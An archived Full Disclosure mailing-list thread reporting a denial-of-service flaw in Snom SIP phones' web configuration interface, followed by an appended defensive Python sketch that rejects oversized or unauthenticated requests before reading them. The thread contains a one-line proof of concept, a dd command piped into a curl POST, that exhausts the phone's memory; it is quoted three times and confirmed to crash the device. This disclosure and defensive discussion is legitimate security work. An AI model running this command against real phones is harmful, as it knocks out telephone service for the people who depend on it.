Date: Tue, 13 Jan 2015 09:26:42 +0100
From: Max Mühlbronner <mm@...om.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] Snom SIP phones denial of service through HTTP

Hi,


it works fine for me:

dd if=/dev/zero bs=1M count=32 | curl http://SNOMIP  --data-binary @-


Phone crashes after just a few seconds.


Best Regards

Max M.

On 12.01.2015 22:20, Martin Schuhmacher wrote:
> Hi
>
> I just did
>
> $ dd if=/dev/zero bs=1M count=32 | curl http://$IP/
> Response: Unauthorized request
>
> Did I miss anything?
>
> Firmware: snom360-SIP 8.7.4.8
> not downloadable any more for some reason?
>
> Yours
> Martin
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> http://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

On 12.01.2015 17:56, kapejod@...glemail.com wrote:
> Snom SIP phones (www.snom.com) have a built-in HTTP/HTTPS configuration
> interface, which is enabled by default.
>
> By making a single HTTP POST request all available memory (and CPU) can be
> exhausted, resulting in a reboot of the phone.
> This even works if the HTTP/HTTPS interface is protected by username and
> password (probably the credentials are checked a few more lines later when
> the complete request has been received).
>
> Affected models: MP, 3XX, 7XX, 8XX (I didn't have any of the other models to
> test)
> Affected firmwares: latest stable, latest beta (most likely some others too)
> Workaround: Disable HTTP/HTTPS interface completely.
>
> PoC:
>
> dd if=/dev/zero bs=1M count=32 | curl http://IP_OF_PHONE --data-binary @-
>
> P.S. Just if you are wondering.... I did not notify the vendor about this.
> Almost two years ago I reported multiple vulnerabilities directly to the
> vendor (including the possibility to install arbitrary software on the
> device), but not much has changed since then.


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
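
The advisory guesses that credentials are only checked once the complete request has been received. As an added example (not part of the thread and not Snom firmware code), this sketch shows the server-side ordering that avoids that: decide from the headers alone, then read at most the admitted length. The names admit and read_body, the 64 KiB cap and the sample credentials are assumptions.

```python
import base64
import hmac

MAX_BODY = 64 * 1024  # assumed cap for a settings form; not a Snom value


def admit(headers, user, password, max_body=MAX_BODY):
    """Decide from the headers alone whether the body may be read.

    Returns (status, bytes_to_read). Nothing is read from the socket here,
    so a rejected request costs no body buffering.
    """
    h = {k.lower(): v.strip() for k, v in headers.items()}
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    expected = ("Basic " + token).encode()
    # 1. Credentials first: unauthenticated clients never reach the body.
    if not hmac.compare_digest(h.get("authorization", "").encode(), expected):
        return 401, 0
    # 2. No declared length (e.g. chunked upload): refuse rather than buffer.
    if "transfer-encoding" in h or "content-length" not in h:
        return 411, 0
    declared = h["content-length"]
    if not (declared.isascii() and declared.isdigit()):
        return 400, 0
    length = int(declared)
    # 3. Declared length over the cap: refuse before reading a byte.
    if length > max_body:
        return 413, 0
    return 200, length


def read_body(stream, length, chunk=4096):
    """Read at most `length` bytes in small chunks, never more than admitted."""
    buf = bytearray()
    while len(buf) < length:
        part = stream.read(min(chunk, length - len(buf)))
        if not part:  # peer closed early
            break
        buf += part
    return bytes(buf)
```

With this ordering, a 32 MiB POST with no credentials is answered with 401 and one with valid credentials with 413, in both cases before any of the body is buffered.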
